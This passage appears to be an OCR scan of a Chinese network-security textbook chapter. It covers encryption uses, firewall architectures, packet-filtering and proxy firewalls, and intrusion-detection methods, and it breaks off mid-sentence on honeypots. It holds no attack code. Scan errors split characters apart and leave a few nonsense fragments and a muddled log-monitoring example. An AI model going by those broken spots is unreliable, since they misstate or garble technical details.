CD 由 于 加 密 算法 强度 较 弱 ,而 遭受 到 网 络 安全 攻击 ,主要 包括 : 四 侦 听 并 解读 明文 
数据 通信 流 , 窃 取 敏 感 数据 ; @ 对 于 捕获 到 的 数据 包 ,进行 恶意 每 改 , OARA KA 
访问 口令 ,对 目标 系统 进行 攻击 ; 外 直接 窃取 加 密 密 钥 。 

(2) 用 于 认证 服务 ,使 网 络 上 的 用 户 可 以 相互 证 明 自 己 的 身份 , 即 能 正确 对 信息 进行 
解密 的 用 户 就 是 合法 用 户 。 用 户 在 对 应 用 服务 器 进行 访问 前 ,必须 从 第 三 方 获取 该 应 用 
服务 器 的 访问 许可 证 。 

(3) 用 于 提高 电子 邮件 的 安全 性 。 目 前 ,电子 邮件 广泛 应 用 的 保密 方法 是 
PGP(pretty good privacy) ,PGP 采用 的 解决 方案 是 给 每 个 公 钥 分 配 一 个 密 钥 标识 ,并 在 
很 大 概率 上 与 用 户 标识 一 一 对 应 。 发 送 方 需要 使 用 一 个 私 钥 加 密 消息 摘要 ,接收 方 必须 
知道 应 使 用 哪个 公 钥 解密 。 相 应 地 ,消息 的 数字 签名 部 分 必须 包括 公 钥 对 应 的 64 位 密 钥 
标识 。 当 接收 到 消息 后 ,接收 方 用 密 钥 标 识 指示 的 公 钥 验证 签名 。 

密码 技术 并 不 能 解决 所 有 的 网 络 安全 问题 , 它 需 要 与 信息 安全 的 其 他 技术 如 访问 控 
制 技术 、 网 络 监控 技术 等 互相 融合 ,形成 综合 的 信息 网 络 安全 保障 。 


2.2 防火 墙 技术 


防火 墙 技术 是 建立 在 现代 通信 网 络 技 术 和 信息 安全 技术 基础 上 的 应 用 性 安全 技术 ， 
越 来 越 多 地 应 用 于 专用 网 络 与 公用 网 络 的 互联 环境 之 中 。 防 火 墙 本 身 具有 较 强 的 抗 攻 击 
能 力 , 它 是 提供 信息 安全 服务 ,实现 网 络 和 信息 安全 的 基础 设施 。 防 火 墙 具有 以 下 特征 : 

。 网 络 位 置 特 性 。 内 部 网 络 和 外 部 网 络 之 间 的 所 有 网 络 数据 都 必须 经 过 防火 墙 。 

* 工作 原理 特性 。 只 有 符合 安全 策略 的 数据 才能 通过 防火 墙 。 

: 先决 条 件 。 防 火 墙 自身 应 具有 非常 强 的 抗 攻 击 能 力 。 
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2.2.1 防火 墙 体 系 结构 


防火 墙 的 四 种 基本 体系 结构 包括 屏蔽 路 由 器 、 双 穴 主 机 网 关 、 屏 项 主机 网 关 、 被 屏蔽 
子 网 ( 非 军事 区 DM2). 

典型 的 实用 防火 墙 包括 三 种 。 

1. 包 过 滤 路 由 器 防火 墙 

包 过 滤 路 由 器 是 一 种 便宜 .简单 .常见 的 防火 墙 。 包 过 滤 路 由 器 在 网 络 之 间 完 成 数 
据 包 转 发 的 普通 路 由 功能 ,并 利用 包 过 滤 规则 来 允许 或 拒绝 数据 包 。 其 结构 如 图 2. 1 
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图 21 包 过 滤 路 由 器 防火 墙 


尽管 这 种 防火 墙 系统 有 价格 低 和 易于 使 用 的 优点 ,但 同时 也 有 缺点 ,如 配置 不 当 的 路 
由 器 可 能 受到 攻击 ,以 及 利用 包 庄 在 允许 服务 和 系统 内 的 操作 进行 攻击 等 。 由 于 允许 在 
内 部 和 外 部 系统 之 间 直 接 交 换 数 据 包 ,因此 攻击 面 可 能 会 扩展 到 所 有 主机 和 路 由 器 所 允 
许 的 全 部 服务 上 。 另 外 ,如 果 有 一 个 包 过 滤 路 由 器 被 渗透 , 则 内 部 网 络 上 的 所 有 系统 都 可 
能 受到 损害 。 

2. 屏蔽 主机 防火 墙 

屏蔽 主机 防火 墙 系统 采用 了 包 过 滤 路 由 器 和 堡垒 主机 ,如 图 2. 2 所 示 。 这 个 防火 墙 
系统 提供 的 安全 等 级 比 包 过 滤 路 由 器 要 高 ,因为 它 实 现 了 网 络 层 安全 ( 包 过 滤 ) 和 应 用 层 
安全 (代理 服务 ) ,所 以 入 侵 者 在 破坏 内 部 网 络 的 安全 性 之 前 ,必须 首先 渗透 两 种 不 同 的 安 
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图 22 屏蔽 主机 防火 墙 ( 单 堡垒 主 机 ) 
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部 系统 上 其 他 主机 的 信息 全 部 被 阻塞 。 由 于 内 部 主机 与 堡垒 主机 处 于 同一 个 网 络 , 内 部 
系统 是 否 人 允许 直接 访问 外 部 网 络 ,或 者 是 要 求 使 用 堡垒 主机 上 的 代理 服务 来 访问 外 部 网 
络 , 全 部 由 安全 策略 来 决定 。 对 路 由 器 的 过 滤 规 则 进行 配置 ,使 得 其 只 接受 来 自 堡 垒 主机 
的 内 部 数据 包 , 并 强制 内 部 用 户 使 用 代理 服务 。 

如 图 2. 3 所 示 ,用 双 宿 堡垒 主机 甚至 可 以 构造 更 加 安全 的 防火 墙 系统 。 这 种 物理 结 
构 强 行 让 所 有 去 往 内 部 网 络 的 信息 经 过 堡垒 主 机 ,由 于 堡垒 主机 是 唯一 能 从 外 部 网 络 上 
直接 访问 的 内 部 系统 ,因此 有 可 能 受到 攻击 的 主机 就 只 有 堡垒 主机 本 身 。 但 是 ,如 果 人 允许 
用 户 注 册 到 堡垒 主机 ,那么 整个 内 部 网 络 上 的 主机 都 会 受到 攻击 的 威胁 。 牢 固 可 靠 .避免 
被 渗透 和 不 允许 用 户 注册 对 堡垒 主机 来 说 是 至 关 重 要 的 。 
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图 23 屏蔽 主机 防火 墙 ( 双 宿 堡垒 主机 ) 


3. 屏蔽 子 网 防火 墙 

屏蔽 子 网 防火 墙 采用 了 两 个 包 过 滤 路 由 器 和 一 个 堡垒 主机 ,如 图 2.4 所 示 。 这 个 防 
火 墙 系统 建立 的 是 最 安全 的 防火 墙 系统 ,因为 在 定义 了 "* 非 军事 区 ”(DMZ) 网 络 后 , 它 支 
持 网 络 层 和 应 用 层 安 全 功能 。 网 络 管理 员 将 堡垒 主 机 、 信 息 服务 器 .Modem 组 以 及 其 他 
公用 服务 器 放 在 DMZ 网 络 中 。 通 过 DMZ 网 络 直接 进行 信息 传输 是 严格 禁止 的 。 
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图 24 屏蔽 子 网 防火 墙 


外 部 路 由 器 用 于 防范 通常 的 外 部 攻击 (如 源 地 址 欺骗 和 源 路 由 攻击 ), 并 管理 外 部 网 
络 到 DMZ 网 络 的 访问 。 它 只 允许 外 部 系统 访问 堡 人 又 主机。 内 部 路 由 器 则 提供 第 二 层 防 
御 , 只 接受 来 自 堡垒 主机 的 数据 包 , 负 责 管 理 DMZ 到 内 部 网 络 的 访问 。 
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部 署 屏蔽 子 网 防火 墙 系统 有 如 下 几 个 特别 的 好 处 : 

CD 入 侵 者 必须 突破 三 个 不 同 的 设备 才能 侵袭 内 部 网 络 : 外 部 路 由 器 .堡垒 主 机 以 
及 内 部 路 由 器 。 

(2) 由 于 外 部 路 由 器 只 能 向 外 部 网 络 通告 DMZ 网 络 的 存在 ,这 样 网 络 管理 员 就 可 以 
保证 内 部 网 络 是 “不 可 见 ” 的 ;由 于 内 部 路 由 器 只 向 内 部 网 络 通告 DMZ 网 络 的 存在 ,内 部 
网 络 上 的 系统 不 能 直接 通 往外 部 网 络 ,这 样 就 保证 了 内 部 网 络 上 的 用 户 必 须 通 过 驻 留 在 
堡垒 主机 上 的 代理 服务 才能 访问 外 部 网 络 。 


2.2.2 包 过 滤 防 火 墙 


包 过 滤 防 火 墙 工作 在 OSI 网 络 参考 模型 的 网 络 层 和 传输 层 , 它 根据 数据 包头 的 源 地 
址 .目的 地 址 .端口 号 和 协议 类 型 等 标志 确定 数据 流 是 否 允 许 通过 ,如 图 2.5 所 示 。 


25 包 过 滤 防 火 墙 结构 


包 过 滤 是 一 种 网 络 安全 保护 机 制 , 用 来 控制 进出 网 络 的 数据 流 。 通 过 控制 存在 于 某 
一 网 段 的 数据 流 类 型 , 包 过 滤 技 术 可 以 限定 存在 于 某 一 网 段 的 服务 内 容 , 不 符合 网 络 安全 
的 服务 将 被 严格 限制 。 基 于 包 中 的 协议 类 型 和 字段 值 ,过 滤 路 由 器 能 够 区 分 数据 流量 。 

包 过 滤 具 有 以 下 优点 : 

e 一 个 独立 的 、 网 络 位 置 适当 的 包 过 滤 路 由 器 有 助 于 保护 整个 网 络 。 如 果 仅 有 一 个 
路 由 器 连接 内 部 与 外 部 网 络 ,不 论 内 部 网 络 大 小 .拓扑 结构 如 何 , 通 过 单个 路 由 器 
进行 数据 包 过 滤 ,在 网 络 安全 保护 上 都 会 取得 较 好 的 效果 。 

。 数据 包 过 滤 对 用 户 透 明 。 不 同 于 代理 技术 ,数据 包 过 滤 不 要 求 任 何 自 定义 配置 ， 
也 不 要 求 用 户 进行 任何 特殊 学 习 。 较 强 的 “透明 度 ” 是 包 过 滤 的 一 大 优势 。 

。 过 滤 速 度 快 ,效率 高 。 就 代理 技术 而 言 , 包 过 滤 技 术 只 检查 报头 相应 字段 ,一 般 不 
查看 数据 包 的 内 容 , 且 核心 部 分 是 由 硬件 实现 的 , 故 转发 速度 快 ` 效 率 高 。 

包 过 滤 具 有 以 下 缺点 : 

。 不 能 彻底 防止 地 址 欺骗 。 大 多 数 包 过 滤 技术 都 是 基于 源 IP 地 址 、 目 的 IP 地 址 
而 进行 过 滤 的 。 而 耳 地 址 的 伪造 是 很 容易 、 很 普遍 的 ,即使 按 MAC 地 址 进行 
绑 定 ,也 是 不 可 信 的 。 对 于 一 些 安全 性 要 求 较 高 的 网 络 , 包 过 滤 技 术 无 法 满足 
BER 

* 部 分 应 用 协议 不 适合 于 数据 包 过 滤 。RPC、X-Window fl FTP 等 应 用 协议 无 法 适 
用 于 包 过 滤 技术 。 服 务 代 理 和 HTTP 链接 也 会 削弱 基于 源 地 址 和 源 端口 的 过 滤 
功能 。 
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。 数据 包 过 滤 技术 无 法 执行 某 些 安全 策略 。 数 据 包 过 滤 技 术 所 提供 的 信息 不 能 完 
全 满足 人 们 对 安全 策略 的 需求 ,不 能 强行 限制 特殊 的 用 户 。 同 样 地 , 当 通过 端口 
号 对 高 级 协议 强行 进行 限制 时 ,恶意 的 知情 者 能 够 很 容易 地 破坏 这 种 控制 。 
从 以 上 分 析 可 以 看 出 , 包 过 滤 防 火 墙 技术 虽然 能 确保 一 定 的 安全 保护 ,但 是 作为 第 一 
代 防 火 墙 技术 ,本身 存在 较 多 缺陷 ,不 能 提供 较 高 的 安全 性 。 在 实际 应 用 中 ,很 少 把 包 过 
滤 技 术 当 做 单独 的 安全 解决 方案 ,而 是 通常 把 它 与 其 他 防火 墙 技术 捆绑 使 用 。 


2.2.3 代理 防火 墙 


代理 防火 墙 是 一 种 较 新 型 的 防火 墙 技术 ,其 特点 是 完全 “阻隔 ”了 网 络 数据 流 ,通过 对 
每 种 应 用 服务 编制 专门 的 代理 程序 ,实现 监视 和 控制 应 用 层 数据 流 的 功能 。 它 分 为 应 用 
层 网 关 和 电路 层 网 关 。 

代理 防火 墙 工作 于 应 用 层 , 且 针对 特定 的 应 用 层 协议 。 代 理 防 火 墙 通过 软件 方式 获 
取 应 用 层 通 信 流 量 , 并 在 用 户 层 和 应 用 协议 层 提供 访问 控制 ,保持 所 有 应 用 程序 的 使 用 记 
录 。 记 录 和 控制 所 有 进出 流量 的 能 力 是 应 用 层 网 关 的 主要 优点 之 一 。 

如 图 2. 6 所 示 ,代理 服务 器 作为 内 部 网 络 客户 端的 服务 器 拦截 住所 有 要 求 ,也 向 客户 
端 转发 响应 。 代 理 客户 (proxy client) 负 责 代 表 内 部 客户 端 向 外 部 服务 器 发 出 请 求 , 当然 
也 向 代理 服务 器 转发 响应 。 当 某 用 户 想 和 一 个 运行 代理 的 网 络 建立 联系 时 ,应 用 层 网 关 
会 阻塞 这 个 连接 ,然后 对 连接 请 求 的 各 个 域 进行 检查 。 如 果 此 连接 请 求 符合 预定 的 安全 
策略 或 规则 ,代理 防火 墙 便 会 在 用 户 和 服务 器 之 间 建 立 一 个 “ 桥 ”, 从 而 保证 其 通信 。 对 不 
符合 预定 的 安全 规则 的 , 则 阻塞 或 抛弃 。 


真实 服务 器 


应 用 协议 
i ope 


真实 的 客户 端 


图 26 应 用 层 网 关 代理 技术 


另 一 种 类 型 的 代理 技术 称 为 电路 层 网 关 (circuit gateway) 。 在 电路 层 网 关中 , 包 被 提 
交 至 用 户 应 用 层 处 理 。 电 路 层 网 关 用 来 在 两 个 通信 端 之 间 转 换 包 ,如 图 2.7 所 示 。 

电路 层 网 关 是 建立 应 用 层 网 关 的 一 个 更 加 灵活 的 方法 。 在 电路 层 网 关中 ,可 能 要 安 
装 特殊 的 客户 机 软件 ,用户 需 要 一 个 用 户 接口 来 相互 作用 。 

代理 防火 墙 技术 具有 以 下 优点 : 
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图 27 电路 层 网 关 代理 技术 


代理 易于 配置 。 由 于 是 软件 ,所 以 代理 较 过 滤 路 由 器 更 易 配 置 。 如 果 代 理 实现 得 
好 , 则 对 配置 协议 的 要 求 可 以 低 一 些 , 从 而 避免 了 配置 错误 。 
代理 能 生成 各 项 记录 。 代 理工 作 在 应 用 层 , 它 检查 各 项 数据 ,所 以 可 以 生成 各 项 
日 志 、 记 录 。 这 些 日 志 、 记 录 对 于 流量 分 析 、 安 全 检验 是 十 分 重要 的 。 

代理 能 灵活 地 控制 进出 流量 。 通 过 采取 一 定 的 措施 ,按照 一 定 的 规则 ,可 以 借助 
代理 实现 一 整套 的 安全 策略 。 

代理 能 过 滤 数 据 内 容 。 可 以 把 一 些 过 滤 规 则 应 用 于 代理 ,让 它 实现 文本 过 滤 \ 图 
像 过 滤 、 预 防 病毒 或 扫描 病毒 等 功能 。 

代理 能 为 用 户 提供 透明 的 加 密 机 制 。 代 理 能 够 完成 加 解密 的 功能 ,从 而 确保 数据 
的 机 密 性 ,这 点 在 虚拟 专用 网 中 特别 重要 。 

代理 可 以 方便 地 与 其 他 安全 手段 集成 。 目 前 的 安全 问题 解决 方案 很 多 ,如 认证 
(authentication) 授权 (authorization)、 账 号 (accounting) 数据 加 密 、 安 全 协议 
(SSL) 等 。 如 果 将 代理 与 这 些 手段 联合 使 用 ,将 大 大 增加 网 络 安 全 性 。 


代理 防火 墙 技术 具有 以 下 缺点 : 


代理 速度 较 路 由 器 慢 。 路 由 器 只 是 简单 检查 TCP/IP 报头 特定 的 几 个 域 ,不 
做 详细 分 析 、 记 录 。 而 代理 工作 于 应 用 层 , 要 检查 数据 包 的 内 容 , 按 特定 的 应 
用 协议 (如 HTTP) 审 查 .扫描 “数据 包 内 容 , 进 行 代理 (转发 请 求 或 响应 ) ,速度 
代理 对 用 户 不 透明 。 许 多 代理 要 求 用 户 安装 特定 客户 端 软 件 ,这 给 用 户 增加 了 不 
透明 度 。 安 装 和 配置 特定 的 应 用 程序 既 耗 费时 间 , 又 容易 出 错 。 

代理 服务 不 能 保证 免 受 所 有 协议 弱点 的 限制 。 作 为 一 个 安全 问题 的 解决 方法 , 代 
理 服务 的 安全 取决 于 对 协议 中 安全 操作 的 判断 能 力 。 每 个 应 用 层 协 议 都 或 多 或 
少 存在 一 些 安全 问题 ,对 于 一 个 代理 服务 器 来 说 ,要 彻底 避免 这 些 安全 隐患 几乎 
是 不 可 能 的 ,除非 关 掉 这 些 服务 。 

代理 不 能 改进 低层 协议 的 安全 性 。 因 为 代理 工作 在 TCP/IP 之 上 ,属于 应 用 层 ， 
所 以 它 不 能 改善 低层 通信 协议 的 能 力 。 对 于 IP 欺骗 .SYN 泛滥 、 伪 造 ICMP 消 
息 和 一 些 拒绝 服务 攻击 缺乏 必要 的 抵抗 能 力 和 应 对 机 制 。 而 这 些 方面 对 于 网 络 
的 健壮 性 是 相当 重要 的 。 
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2.3 入 侵 检测 


据 统计 ,全 球 80% 以 上 的 入 侵 来 自 于 网 络 内 部 。 由 于 性 能 的 限制 ,防火 墙 通常 不 能 
提供 实时 的 入 侵 检测 能 力 , 对 于 来 自 于 内 部 网 络 的 攻击 ,防火 墙 形 同 虚 设 。 入 侵 检 测 是 对 
防火 墙 极其 有 益 的 补充 。 入 侵 检测 系统 能 在 入 侵 攻击 对 系统 发 生 危 害 前 检测 到 入 侵 攻 
击 , 并 利用 报警 与 防护 系统 驱逐 入 侵 攻 击 。 在 入侵 攻击 过 程 中 ,能 减少 入侵 攻击 所 造成 的 
损失 。 在 被 人 侵 攻击 后 ,收集 入 侵 攻击 的 相关 信息 ,作为 防范 系统 的 知识 ,添加 到 知识 库 
中 ,增强 系统 的 防范 能 力 ,避免 系统 再 次 受到 入 侵 。 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进 
行 监听 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 监控 ,大 大 提高 了 网 络 的 安全 性 。 


2.3.1 入 侵 检 测 技 术 分 类 


入 侵 检 测 是 从 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 搜集 信息 并 对 其 进行 分 析 ， 
从 中 发 现 网 络 或 系统 中 是 否 存在 违反 安全 策略 的 行为 和 吐 到 袭击 的 迹象 的 一 种 机 制 。 入 
侵 检测 系统 使 用 入 侵 检测 技术 对 网 络 与 系统 进行 监视 ,并 根据 监视 结果 采取 不 同 的 安全 
动作 ,从 而 最 大 限度 地 降低 可 能 的 入 侵 危 害 。 经 过 几 年 的 发 展 , 入 侵 检测 产品 开始 步 和 人 快 
速 的 成 长 期 。 


2.3.1.1 基于 网 络 的 人 侵 检 测 

基于 网 络 的 入侵 检测 产品 (NIDS) 放 置 在 比较 重要 的 网 段 内 ,不 停 地 监视 网 段 中 的 各 
种 数据 包 ,对 数据 包 进 行 特 征 分 析 。 如 果 数 据 包 与 内 置 的 某 些 规则 吻合 ,入 侵 检 测 系 统 就 
会 发 出 警报 甚至 直接 切断 网 络 连接 。 目 前 ,大 部 分 人 侵 检测 产品 是 基于 网 络 的。 值得 一 
提 的 是 ,在 网 络 人 侵 检测 系统 中 ,有 多 个 久负盛名 的 开放 源码 软件 ,它们 是 Snort, NFR, 
Shadow 等 。 

网 络 人 侵 检测 系统 具有 以 下 优点 : 

。 网 络 人 侵 检测 系统 能 够 检测 来 自 网 络 的 攻击 ,特别 是 越权 的 非法 访问 。 

。 不 需要 改变 服务 器 等 主机 的 配置 ,不 占用 过 多 的 系统 资源 ,不 影响 业务 系统 的 
性 能 。 

。 发生 故 障 不 会 影响 正常 业务 的 运行 ,部 署 一 个 网 络 入 侵 检 测 系统 的 风险 比 主机 入 
侵 检测 系统 的 风险 少 得 多 。 

网 络 和 人 侵 检测 系统 具有 以 下 弱点 : 

。 网 络 入 侵 检 测 系统 只 检查 直接 连接 网 段 的 通信 ,不 能 检测 在 不 同 网 段 的 网 络 包 。 
在 使 用 交换 以 太 网 的 环境 中 会 出 现 检 测 范围 的 局 限 。 而 安装 多 台 网 络 入 侵 检 测 
系统 的 传感器 会 使 部 署 整个 系统 的 成 本 大 大 增加 。 

。 网 络 入 侵 检 测 系统 为 了 性 能 目标 通常 采用 特征 检测 的 方法 , 它 可 以 检测 出 一 些 简 
单 的 普通 攻击 ,而 很 难 检测 出 一 些 复杂 的 需要 大 量 计算 与 分 析 时 间 的 攻击 。 

。 网 络 入 侵 检 测 系 统 可 能 会 将 大 量 的 数据 传 回 分 析 系 统 中 。 在 一 些 系统 中 监听 特 
定 的 数据 包 会 产生 大 量 的 分 析 数 据 流量 。 这 样 的 系统 中 ,传感器 协同 工作 能 力 
BS. 
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。 网 络 入 侵 检测 系统 处 理 加 密 的 会 话 过 程 较 困难 ,目前 通过 加 密 通 道 的 攻击 尚 不 
多 , 随 着 IPv6 的 普及 ,这 个 问题 会 越 来 越 突出 。 


2.3.1.2 基于 主机 的 人 侵 检 测 

基于 主机 的 入 侵 检测 产品 (HIDS) 通 常 是 安装 在 被 重点 监测 的 主机 上 ,对 该 主机 的 网 
络 连接 以 及 系统 审计 日 志 进 行 智能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 , 入 侵 检测 
系统 就 会 采取 相应 措施 。 

主机 入 侵 检 测 系统 具有 以 下 优点 : 

。 主 机 入 侵 检 测 系统 与 网 络 入 侵 检 测 系统 相 比 通常 能 够 提供 更 详尽 的 相关 信息 。 

。 主机 入 侵 检测 系统 通常 情况 下 比 网 络 入 侵 检测 系统 误 报 率 要 低 , 因 为 检测 主机 上 
运行 的 命令 序列 比 检测 网 络 流 更 简单 ,系统 的 复杂 性 也 少 得 多 。 

主机 入 侵 检 测 系统 具有 以 下 弱点 : 

。 主机 入 侵 检 测 系 统 安 装 在 需要 保护 的 设备 上 ,会 降低 应 用 系统 的 效率 。 安 装 了 
主机 入 侵 检 测 系 统 后 ,将 把 不 允许 安全 管理 员 访 问 的 服务 器 变 成 可 以 访问 
mr. 

。 主机 入 侵 检测 系统 依赖 于 服务 器 固有 的 日 志 与 监视 能 力 。 如 果 服 务 器 没有 配置 
日 志 功 能 , 则 必须 重新 配置 ,这 将 会 给 运行 中 的 业务 系统 带 来 不 可 预见 的 性 能 
影响 。 

* 全 面部 署 主机 入 侵 检测 系统 代价 较 大 ,只 能 选择 部 分 主机 保护 。 那 些 未 安装 主机 
入 侵 检测 系统 的 机 器 将 成 为 保护 的 盲点 ,入侵 者 可 利用 这 些 机 器 达到 攻击 目标 。 

。 主机 入 侵 检测 系统 除了 监测 自身 的 主机 以 外 ,根本 不 监测 网 络 上 的 情况 。 对 入 侵 
行为 分 析 的 工作 量 将 随 着 主机 数目 的 增加 而 增加 。 


2.3.1.3 混合 人 侵 检 测 
基于 网 络 的 入 侵 检 测 产 品 和 基于 主机 的 入 侵 检 测 产品 都 有 不 足 之 处 ,单纯 使 用 一 类 
品 会 造成 主动 防御 体系 不 全 面 。 但 是 ,它们 的 缺陷 是 可 以 互补 的 。 综 合 基于 网 络 和 基 
于 主机 两 种 结构 特点 的 和 人 侵 检测 系统 , 既 可 发 现 网 络 中 的 攻击 信息 ,也 可 从 系统 日 志 中 发 
现 异 常情 况 ,构架 成 一 套 完整 立体 的 主动 防御 体系 , 称 为 混合 入侵 检测 方法 。 


2.3.1.4 文件 完整 性 检查 
文件 完整 性 检查 系统 检查 计算 机 中 的 文件 变化 情况 。 文 件 完 整 性 检查 系统 保存 有 每 
个 文件 的 数字 文摘 数据 库 ,每 次 检查 时 , 它 重 新 计算 文件 的 数字 文摘 并 将 它 与 数据 库 中 的 
值 相 比较 ,如 不 同 , 则 文件 已 被 修改 , 若 相 同 , 则 文件 未 发 生变 化 。 
文件 完整 性 检查 系统 具有 以 下 优点 : 
。 从 数学 上 分 析 ,攻克 文件 完整 性 检查 系统 ,无 论 是 时 间 上 还 是 空间 上 ,都 是 不 可 能 
的 。 文 件 完整 性 检查 系统 是 一 个 检测 系统 是 否 被 非法 使 用 的 重要 工具 之 一 。 
。 文件 完整 性 检查 系统 具有 相当 的 灵活 性 ,可 以 用 于 监测 系统 中 所 有 文件 或 某 些 重 
要 文件 
文件 完整 性 检查 系统 具有 以 下 弱点 : 
。 文件 完整 性 检查 系统 依赖 于 本 地 的 文摘 数据 库 。 与 日 志文 件 一 样 , 这 些 数 据 可 能 
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被 入 侵 者 修改 。 

。 做 一 次 完整 的 文件 完整 性 检查 是 一 个 非常 耗 时 的 工作 。 

。 系统 有 些 正常 的 更 新 操作 可 能 会 带 来 大 量 的 文件 更 新 ,从 而 产生 比较 繁杂 的 检查 
与 分 析 工 作 。 


2.3.2 ”入侵 检测 系统 结构 


1980 年 4 月 ,研究 人 员 在 为 美国 空军 提交 的 一 份 题 为 (计算 机 安全 威胁 监控 与 监视 》 
的 技术 报告 中 ,第 一 次 完整 地 介绍 了 入 侵 检测 技术 的 概念 。 报 告 认为 这 是 一 种 对 计算 机 
系统 风险 和 威胁 的 分 类 方法 ,并 将 威胁 分 为 外 部 渗透 ,内 部 渗透 和 不 法 行为 三 种 ,还 提出 
了 利用 审计 跟踪 数据 监视 入 侵 活动 的 核心 思想 。 


2.3.2.1 人 侵 检测 系统 结构 

一 个 入 侵 检测 产品 通常 由 两 部 分 组 成 : 传感器 (sensor) 与 控制 台 (console)。 传 感 器 
负责 采集 数据 (网 络 包 、 系 统 日 志 等 ) 分析 数据 并 生成 安全 事件 。 控 制 台 主 要 起 到 中 央 管 
理 的 作用 ,商品 化 的 产品 通常 提供 图 形 界 面 的 控制 台 ,这 些 控制 台 基 本 上 都 支持 
Windows NT 平台 。 入 侵 检 测 系 统 (intrusion detection system) 采 用 的 技术 主要 包括 特 
征 检测 和 异常 检测 两 类 。 

1. 特征 检测 

特征 检测 (signature-based detection) 技 术 将 入 侵 活动 定义 为 一 种 模式 ,入 侵 检测 过 
程 则 是 寻找 与 人 侵 行 为 相 匹配 的 各 种 模式 。 该 类 技术 能 够 很 准确 地 将 已 有 的 人 侵 行为 检 
查 出 来 ,但 由 于 缺乏 相 匹 配 的 模式 , 故 无 法 检测 到 新 的 入 侵 行为 。 特 征 检 测 方式 与 计算 机 
病毒 扫描 技术 相 类 似 , 核 心 问题 在 于 如 何 设计 模式 , 尽 可 能 地 将 各 种 非法 活动 吉 括 进来 。 

2. 异常 检测 

异常 检测 (abnormally detection) 系 统 预 先 定义 出 一 组 正常 运行 的 环境 变量 ,主要 包 
括 CPU 运行 情况 、 内 存 利用 率 、 网 络 平均 流量 等 ,这 些 环境 信息 可 以 人 为 地 根据 经 验 知 
识 定 义 , 也 可 以 采用 统计 方法 根据 系统 日 常 运行 情况 得 出 。 当 入 侵 检 测 系 统 在 检测 过 程 
中 发 现 运 行 数据 与 预先 定义 环境 参数 差异 较 大 时 ,系统 就 会 认定 存在 入 侵 情况 ,并 进一步 
进行 检查 。 这 类 技术 的 核心 问题 是 如 何 准确 地 定义 系统 正常 的 环境 变量 。 

2.3.2.2 常用 人 侵 检 测 方法 

据 公安 部 计算 机 信息 系统 安全 产品 质量 监督 检验 中 心 的 报告 ,国内 送 检 的 人 侵 检 测 
产品 中 95% 是 属于 使 用 入 侵 模 板 进行 模式 匹配 的 特征 检测 产品 ,少量 是 采用 概率 统计 的 
统计 检测 产品 与 基于 日 志 的 专家 知识 库 系统 产品 。 入 侵 检测 系统 常用 的 检测 方法 有 特征 
检测 ,统计 检测 与 专家 系统 。 

1. 特征 检测 

特征 检测 对 已 知 的 攻击 或 人 侵 的 方式 作出 确定 性 的 描述 ,形成 相应 的 事件 模式 。 当 
被 审计 的 事件 与 已 知 的 入侵 事件 模式 相 匹 配 时 , 即 报警 。 该 方法 预报 检测 的 准确 率 较 高 ， 
但 对 于 无 经 验 知识 的 入侵 与 攻击 行为 无 能 为 力 。 

2. 统计 检测 

在 统计 模型 中 常用 的 测量 参数 包括 审计 事件 的 数量 、 间 隔 时 间 、 资 源 消耗 情况 等 。 常 
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用 的 人 侵 检测 包括 五 种 统计 模型 。 

CD 操作 模型 : 该 模型 假设 异常 可 通过 测量 结果 与 一 些 固定 指标 相 比 较 得 到 ,固定 
指标 可 以 根据 经 验 值 或 一 段 时 间 内 的 统计 平均 得 到 。 

(2) 方差 : 计算 参数 的 方差 , 设 定 其 置信 区 间 , 当 测量 值 超过 置信 区 间 的 范围 时 表明 
有 可 能 是 异常 。 

(3) 多 元 模型 : 操作 模型 的 扩展 ,通过 同时 分 析 多 个 参数 实现 检测 。 

(4) 马尔 柯 夫 过 程 模型 : 将 每 种 类 型 的 事件 定义 为 系统 状态 ,用 状态 转移 矩阵 来 表 
示 状 态 的 变化 ,状态 矩阵 的 转移 的 概率 较 小 则 可 能 是 异常 事件 。 

C5) 时 间 序 列 分 析 : 将 事件 计数 与 资源 消耗 用 时 间 排 成 序列 ,如 果 一 个 新 事件 在 该 
时 间 发 生 的 概率 较 低 , 则 该 事件 可 能 是 入 侵 。 

3. 专家 系统 

用 专家 系统 对 入 侵 进行 检测 ,经 常 是 针对 特征 入 侵 行为 。 专 家 系统 的 建立 依赖 于 知 
识 库 的 完备 性 ,知识 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 与 实时 性 。 入 侵 的 特征 抽取 
与 表达 ,是 入 侵 检测 专家 系统 的 关键 。 专 家 系统 防范 的 有 效 性 完全 取决 于 专家 系统 知识 
库 的 完备 性 。 


2.3.3 ”重要 入 侵 检测 系统 


按照 检测 对 象 划分 ,可 以 分 为 以 下 几 种 重要 的 人 侵 检 测 系 统 。 

(1) 系统 完整 性 检测 (system integrity verifiers,SIV) : 主要 用 于 检测 系统 文件 或 注册 表 
等 重要 位 置信 息 是 否 被 算 改 ,防止 入 侵 者 在 入 侵 过 程 留 下 系统 的 后 门 。 该 类 系统 的 工具 软 
件 较 多 ,如 “Tripwire”, 它 可 以 检测 到 重要 系统 组 件 的 变动 ,但 不 产生 实时 报警 信息 。 

(2) 网 络 人 侵 检测 系统 (network intrusion detection system. NIDS): 主要 用 于 检测 
黑客 或 骇 客 通过 网 络 进行 的 各 类 入 侵 行 为 。NIDS 的 运用 方式 有 两 种 , 即 在 目标 主机 上 
以 监测 通信 信息 为 主 的 检测 模式 ,以 及 在 独立 机 器 上 以 监测 网 络 设备 运行 为 目标 的 单机 
模式 。 

(3) 日 志文 件 监测 器 (log file monitors, LFM); 主要 用 于 监测 网 络 日 志文 件 内 容 , 这 
是 一 种 特征 检测 技术 的 典型 应 用 。LFM 通过 将 日 志文 件 内 容 与 关键 字 不 断 匹 配 , 来 获取 
入 侵 行为 的 存在 。 例 如 ,对 于 HTTP 服务 器 的 日 志文 件 , 只 要 匹配 “swatch” 关 键 字 ,就 能 
够 检测 到 是 否 存在 "PHF? 攻 击 。 

(4) 虚拟 蜜 网 ,也 称 为 蜜 饶 系 统 (honeypots): 它 是 一 个 包含 若干 漏洞 的 诱骗 系统 。 
它 通 过 模拟 一 个 或 多 个 易 受 到 攻击 的 主机 ,为 攻击 者 创造 一 个 极 易 入 侵 的 目标 。 由 于 每 
